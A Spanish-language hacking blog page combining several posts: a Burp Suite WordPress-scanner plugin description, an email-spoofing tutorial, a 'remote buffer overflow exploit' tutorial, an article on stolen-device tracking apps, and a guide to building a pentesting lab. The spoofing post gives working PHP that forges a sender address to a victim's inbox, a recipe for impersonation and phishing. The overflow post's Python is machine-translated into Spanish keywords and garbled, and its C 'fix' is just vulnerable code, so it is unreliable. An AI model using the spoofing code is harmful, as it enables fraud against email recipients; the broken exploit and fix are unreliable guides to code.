HACKER ANGELWHITE GALC

miércoles, 24 de enero de 2018

burp_wp: WPScan like plugin for Burp Suite




Burp WP
Find known vulnerabilities in WordPress plugins and themes using Burp Suite proxy.
Usage
Install extension. Browse WordPress sites through Burp proxy. Vulnerable plugins and themes will appear in the issue list.
Usage

If you have Burp Pro, issues will also appear inside Scanner tab. Interesting things will be highlighted.
Usage pro
Installation
  1. Download Jython standalone JAR, for example, version 2.7
  2. Go to Extender->Options. Set path inside Location of Jython standalone JAR file
Install Jython
  1. Download newest Burp WP
  2. Go to Extender->Extensions. Click Add. Set Extension type to Python. Set path inside Extension file.
Install Burp WP
  1. Burp WP should appear inside Burp Extensions list. Also you will see new tab.
Installed extension

Intruder payload generator

Because proxy requests and responses are used it’s not possible to discover all plugins and themes installed on a specific website.
You can try to get more information manually using intruder payload generator.
Right click on URL inside Proxy->HTTP history and choose Send to Burp WP IntruderSend to intruder
This will replace request method to GET, remove all parameters and set payload position marker.
Now go to Intruder->Tab X->Positions. Correct URL so it points to WordPress homepage.
Intruder positions
Inside Payloads tab uncheck Payload encoding so / won’t be converted to %2f.
Then set Payload type to Extension generated. Now click Select generator:
Intruder choose payload
There are 3 generators:
  1. WordPress Plugins
  2. WordPress Themes
  3. WordPress Plugins and themes
Intruder attack
Copyright (c) 2018 Kacper Szurek



Como hacer un email spoofing


¿Que es un email spoofing?

spoofing se refiere a suplantación o falsificación entonces cuando hablamos de email spoofing es que vamos a suplantar un correo ya sea de una persona o de una organización, ya cada quien sabrá con que fines lo estará haciendo, pero no solo existe email spoofing si no que existen otras técnicas que a futuro explicaremos.

¿Como realizar un email spoofing?

Hay diferentes formas de hacer un ataque de email spoofing depende que tan sofisticado sea el ataque que queramos hacer nos llevara mas tiempo, yo mostrare la forma mas basica de hacer un email spoofing pero es muy probable que este email que envies se vaya a correos no deseados o no entre la bandeja principal pero en gmail es muy posible que si entre a la bandeja principal, hay metodo para realizar este ataque mas sofisticado dependiendo a que tipo de servidor de smpt quieras hacer el ataque podras falsificar algo asi como el certificado que comprueba que este se envie de una buena procedencia.

Pasos para realizar un email spoofing

-Primero necesitas un hosting para que el servidor del hosting les permita el envio del correo, ya hay algunos hosting que no permiten enviar correos sin autentificacion smpt, que quiere decir esto, quiere decir que no podrás enviar correos si no colocas una contraseña y correo valido en tu codigo php o en lo que lo estes haciendo.
-Después de tener un hosting que te sirva podrás crear el archivo.php con el siguiente código que voy colocar explicado lo necesario.

$informacion ='<h2>Hola Sr.</h2><p>Esto es una prueba de email spoofing</p>’; //variable del contenido
$header = “Content-type: text/html; charset=utf-8″ .”\r\n”;$header .= “From: cuentafalsa@presiden.com”; //cabecera del contenido
mail(“victima@gmail.com”,”Seguridad gmail”,$informacion,$header); //funcion php que hace el envio del email.
Después de a ver realizado los pasos abres la pagina donde quedo creado el archivo y esta ejecutara la función en php enviando el mensaje, si tienes conocimientos avanzados de html5 y php podras hacer un formulario donde podras hacer email spoofing repetidas veces de manera mucho mas rápida. “aclaro que no me hago responsable del uso”
para los curiosos que quieran probar esta técnicas pueden investigar un poco mas en google buscando la función phpmailer que te permite hacer el envió y te dará una visión mas detallada de lo que se puede hacer.

si no quedo totalmente claro con el articulo pues que mejor que un video.





una tecnica bastante parecida pero suplantando paginas web



Cómo escribir una vulnerabilidad de desbordamiento de búfer remoto utilizando Python




Bienvenidos chicos, hoy aprenderemos cómo escribir un desbordamiento de búfer remoto usando el lenguaje de programación Python solo con TCP.
Lo que realmente necesitas:
-Python 3.4 (o superior)
- Una conexión a Internet estable
Un servidor vulnerable
-Computadora con sistema operativo Windows o Linux
Si no tiene Python instalado en su computadora, puede descargarlo desde  https://www.python.org/downloads/ . El proceso de instalación es muy sencillo y directo.
Escribiendo un Exploit Remote Overflow Exploit Usando Python
1. Encuentre un servidor para probar pourpose
Esta es una parte un poco complicada. Intenta buscar dorks en GHDB ( https://www.exploit-db.com/google-hacking-database/ ). También puede intentar buscar software vulnerable en Exploit-DB ( https://www.exploit-db.com ).
2. Codificación
La codificación es la parte divertida. Comencemos importando sys y socket, luego, escriba el siguiente código:
para carg en sys.argv:
            si carg == "-s":
                        argnum = sys.argv.index (carg)
                        argnum + = 1
                        host = sys.argv [argnum]
            elif carg == "-p":
                        argnum = sys.argv.index (carg)
                        argnum + = 1
                        port = sys.argv [argnum [
buffer = "\ x41" * 3000
s = socket.socket (socket.AF_INET, socket.SOCK_STREA M)
s.connect ((host, puerto))
s.send ("USV" + buffer + "// r // n // r")
s.close ()
El código se verá así:
buffer_overflow_exp1
Ahora, veamos qué hace realmente el código. Ya conocemos el argumento script de identificación. La segunda línea crea un buffer, que es \ x41 multiplicado 3000 veces. Luego podemos ver las líneas de declaración de la s como socket, luego conectar con ella, enviar el buffer requerido y cerrar el socket. Parece bastante fácil, ¿verdad?
Una vez que hayamos terminado con los pasos anteriores, revisemos el resultado de nuestro script.
buffer_overflow_exp2

Como puede ver, el script funciona bien y lo he probado un par de veces.
Cómo evitar el desbordamiento del búfer remoto
La solución depende de su lenguaje de programación, por ejemplo, si usa el lenguaje C.
int authed = 0; 
char password_buffer [16]; 
strcopy (password_buffer, your_password) 
if (strcmp (password_buffer, password) == 0) { 
authenticado = 1; 

else { 
authed = 0; 
}
Entonces, una vez que su_contraseña es más de 16, puede implementar el desbordamiento de autenticación, o si hay aún más, puede obtener un desbordamiento del búfer con error de segmentación.
Hay varias soluciones para este problema.



Localizar Mi Celular, Tablet O Laptop Robada

Resultado de imagen para mapa de rastreo satelital





Apps Para localizar tus dispositivos robados

Una situación común de la sociedad actual es ir con afán todo el día. Entre todo ese maratón diario, es posible que dejes olvidado tu celular y que luego no recuerdes dónde lo dejaste. Puede pasar algo peor: te pueden robar tu móvil.
Lamentablemente, cada día se vuelve más común el hurto o robo de estos útiles dispositivos en cualquier parte, a nivel mundial. Es por ello que los programadores, en especial los desarrolladores de aplicaciones, se han dedicado a la optimización de programas para localizar un dispositivo móvil.

Como localizar mi dispositivos móviles:

Una forma de ubicar un Android es con el Administrador de Dispositivos de Google y en caso de que el dispositivo sea de Apple, tenemos la opción “buscar mi iPhone”.
Estos dos rastreadores, con un par de clicks permiten localizar, en tiempo real, el o los dispositivos móviles que poseas asociados a tu cuenta Google o Apple. Eso no es todo, si el dispositivo se encuentra cerca, puedes hacerlo sonar y de esta manera saber donde está. Si fuiste víctima de hurto o robo, una vez que localices tu dispositivo en el mapa, podrás bloquearlo y borrar toda la información que hayas almacenado en él, sin importar si está cerca o no.
Además de estas dos herramientas, también se hallan disponibles en el mercado muchas aplicaciones para ambos sistemas operativos que cumplen con estos fines.
Esta aplicación es gratis, también tiene una versión premiun, funciona para Tablet, laptop y obviamente móviles, algunas funcionalidades que tiene esta aplicación son: localización gps , bloquear el dispositivo, mostrar un mensaje tipo alerta, recibir reportes con fotos entre otras , en la versión premiun te dejan colocar más de 3 dispositivos a la vez y te dejan más funcionalidades pero para muchos con la versión free te va excelente y lo mejor puedes bloquear la apps para que no la puedan eliminar.

Esta aplicación se asemeja mucho a pley antirrobos pero no tiene una versión gratis , cuando la descargas te permite unos cuantos días de prueba pero para cuando estos se terminen tendrás que pagar alrededor de 3 a 4 dólares, lo bueno es que es de pago único sus funciones que mas destacas es que puedes borrar los datos del dispositivo, bloqueas la apps para que no puedan tanto borrarla como entrar en ella y  que no sea visible al ladron, puedes tomar foto de quien tiene el celular, tiene disponivilidad de 5 dispositivos a la vez.

McAfee wave secureNorton anti-thieft, entre otras.
La gran desventaja en común de todas es que requieren conexión permanente a internet e información del GPS del dispositivo para cumplir sus funciones, puedes utilizarlas como una medida preventiva pero nada te puede asegurar que puedas recuperarlo aunque esto es una gran ventaja y es mejor prevenir que dejarle las cosas fáciles a los ladrones.


Crea tu laborario de Pentesting - Encuentra tu propio 0 Days




Saludos mis fieles lectores en esta oportunidad, a pedidos de algunos seguidores de la fan page, enseñare a como crear tu laboratorio virtual desde tu sistema, cabe decir que los complementos utilizados en este escenario están disponibles para cualquier sistema operativo.


Para cualquier investigador de seguridad la mejor manera de auditar una plataforma es que este alojada en su propio laboratorio de pruebas por excelencia.


Emular sistemas operativos:


En este primer escenario sin duda es uno de los mas importantes en la rama de la seguridad informática, ya que se enfoca principalmente en sistemas públicos y privados, para encontrar fallas que afecten la privacidad de millones de usuarios y a su vez contengan puertas traseras (Backdoors).

Vulnerabilidades como el Shellshock, hasta el ultimo encontrado denominado Dirty COW se han encontrado en laboratorios virtuales por investigadores independientes.

Herramientas de emulación de sistemas operativos:

Vmware



Es una filial de EMC Corporation (propiedad a su vez de Dell Inc) que proporciona software de virtualización disponible para ordenadores compatibles X86. Entre este software se incluyen VMware Workstation, y los gratuitos VMware Server y VMware Player. El software de VMware puede funcionar en Windows, Linux, y en la plataforma mac OS que corre en procesadores Intel, bajo el nombre de VMware Fusion


Referencia: 

You are not allowed to view links. Register or Login

Pagina de descarga:

You are not allowed to view links. Register or Login

Virtualbox



Oracle VM VirtualBox es un software de virtualización para arquitecturas x86/amd64, creado originalmente por la empresa alemana innotek GmbH.

Referencia:


You are not allowed to view links. Register or Login

Pagina de descarga:

You are not allowed to view links. Register or Login

Estos 2 emuladores mencionados son los mejores y mas utilizados a nivel mundial, puedes emular cualquier sistema operativo.



Sistemas operativos recomendados:


Microsoft Windows

    Windows XP
    Windows 7 
    Windows 8
    Windows 10

GNU/Linux

    Ubunto 
    Debian
    ArchLinux

Mac OS
      Mac OS X Yosemit 

Android

      Android 6.0 Marshmallow


Todos los sistemas mencionados los pueden descargar en archivo de imagen .ISO en sus paginas oficiales.

Si deseas explotar algunos fallos encontrados les recomiendo utilizas versiones "Antiguas", y empezar a testar.



Por el momento estos distros los tengo corriendo para mis pruebas de Testing.

Distros vulnerables para pruebas de Penetration Pestesting:


Existen pequeñas organizaciones que han diseñado sus propios sistemas vulnerables una de ellas es For Pentester y Owasp.

Si desean descargar cualquier distro con fallas conocidas corriendo en dicho sistema no dudes en visitar la pagina:
You are not allowed to view links. Register or Login
Pero sin duda una de las usadas hasta el momento es metasploitable



Metasploitable es una máquina virtual Linux intencionadamente vulnerables. Esta máquina virtual se puede utilizar para llevar a cabo la formación en seguridad, herramientas de seguridad de prueba, y practicar técnicas de pruebas de penetración común.

Referencia:

You are not allowed to view links. Register or Login

Descarga:

You are not allowed to view links. Register or Login

Auditar plataformas Web

El mundo del internet avanza demasiado tecnológicamente hablando, desde que se crearon plataformas web se optimizaron varios procesos que en la vida cotidiana eran muy molestos como por ejemplo depositar dinero en una cuenta, teníamos que hacer horas de cola, pero ahora no es así desde tu dispositivo móvil o tu ordenador puedes hacer eso en menos de 5 segundos por medio de una plataforma web de tu banca online.

La gran pregunta es: ¿Mis datos son seguros? ¿alguien puede obtener mis credenciales? ¿Hackearon la pagina del banco?

Pues si, estas preguntas son las mas frecuentes que cualquier usuario se preguntaría, entonces viene el gran reto de un investigador de seguridad.

"Reportar fallos que perjudican a los usuarios a nivel mundial y mejorar la seguridad informática día a día".

CMS -  Sistemas de gestión de contenidos


Los CMS o Sistemas de gestión de contenidos son plataformas dedicadas especialmente para crear estructuras de soporte y administración de contenidos, principalmente en paginas web.

Existen varias plataformas las mas conocidas son.

Joomla, Wordpress, Drupal, etc.


Como bien sabemos existen varias vulnerabilidades en Plugins y complementos de los mencionados "CMS", ustedes pueden verificar en esta pagina dedicada a Exploits en todo tipo de plataformas:
You are not allowed to view links. Register or Login

digamos que para un investigador de seguridad web es fundamental tener algunos de estos gestores en su localhost para investigar posibles fallos y encontrar algunos 0days.

Descargar Plugins Joomla:



You are not allowed to view links. Register or Login

Descargar Plugins Wordpress:



You are not allowed to view links. Register or Login

Joomla



Joomla es un sistema de gestión de contenidos (o CMS, por las siglas en inglés, Content Management System) que permite desarrollar sitios web dinámicos e interactivos. Permite crear, modificar o eliminar contenido de un sitio web de manera sencilla a través de un "panel de administración". Es un software de código abierto, programado o desarrollado en PHP y liberado bajo Licencia pública general GNU (GPL).

Referencia:
You are not allowed to view links. Register or Login
  
Pagina de descarga:

You are not allowed to view links. Register or Login

Wodpress:



WordPress es un sistema de gestión de contenidos o CMS (por sus siglas en inglés, Content Management System) enfocado a la creación de cualquier tipo de sitio. Originalmente alcanzó una gran relevancia usado para la creación de blogs, para convertirse con el tiempo en una de las principales herramientas para la creación de páginas web comerciales.

Referencia:
You are not allowed to view links. Register or Login

Pagina de descarga:
You are not allowed to view links. Register or Login

Pentesting en plataformas Web

Existen aplicaciones vulnerables web desarrolladas para realizar pruebas de Pentesting, en su mayoría la organización Owasp ha desarrollado buenos ejemplares, como también grupos independientes.

bWAPP



bWAPP, o una aplicación web con errores, es una fuente libre y abierto deliberadamente aplicación web insegura.
Ayuda a entusiastas de la seguridad, los desarrolladores y los estudiantes para descubrir y para prevenir vulnerabilidades web.
bWAPP lo prepara a uno para realizar pruebas de penetración exitosa y proyectos de hacking ético.

Lo que hace tan único bWAPP? Bueno, tiene más de 100 vulnerabilidades web!
Cubre todas las principales web bugs conocidos, incluyendo todos los riesgos del proyecto OWASP Top 10.

Referencia:
You are not allowed to view links. Register or Login

Descarga:

You are not allowed to view links. Register or Login

Damn Vulnerable Web Application



Es una aplicación web PHP / MySQL que es maldita vulnerables. Su objetivo principal es ser una ayuda para los profesionales de la seguridad para poner a prueba sus habilidades y herramientas en un entorno jurídico, ayudar a los desarrolladores web a comprender mejor los procesos de asegurar las aplicaciones web y para ayudar tanto a los estudiantes y profesores para aprender acerca de la seguridad de aplicaciones web en una clase controlada ambiente de la sala.

Descarga:

You are not allowed to view links. Register or Login

SQLi-Labs avanzado



SQLI-LABS es una plataforma para aprender SQLI Siguiendo laboratorios que están cubiertos para parametros GET y POST.

los escenarios son los siguientes:

        Error Based Injections (Union Select)
        String
        Intiger
        Error Based Injections (Double Injection Based)
        BLIND Injections: 1.Boolian Based 2.Time Based
        Update Query Injection.
        Insert Query Injections.
        Header Injections. 1.Referer based. 2.UserAgent based. 3.Cookie based.
        Second Order Injections
        Bypassing WAF
        Bypassing Blacklist filters Stripping comments Stripping OR & AND    Stripping SPACES and COMMENTS Stripping UNION & SELECT
        Impidence mismatch
        Bypass addslashes()
        Bypassing mysql_real_escape_string. (under special conditions)
        Stacked SQL injections.
        Secondary channel extraction

Descarga:
You are not allowed to view links. Register or Login

En mi caso, con las plataformas mencionadas doy mis clases y charlas de seguridad informática y te los recomiendo mucho.

como lo dijo un grande de seguridad Informática, el gran chema alonso:

" Leer, Practicar y ser constante. "


Dejare su vídeo dando algunos consejos para empezar en el mundo de la seguridad informática & Hacking.



Saludos y éxitos para todos, no olvides compartir el blog y dejar un comentario.
agradecer no cuesta nada, Saludos.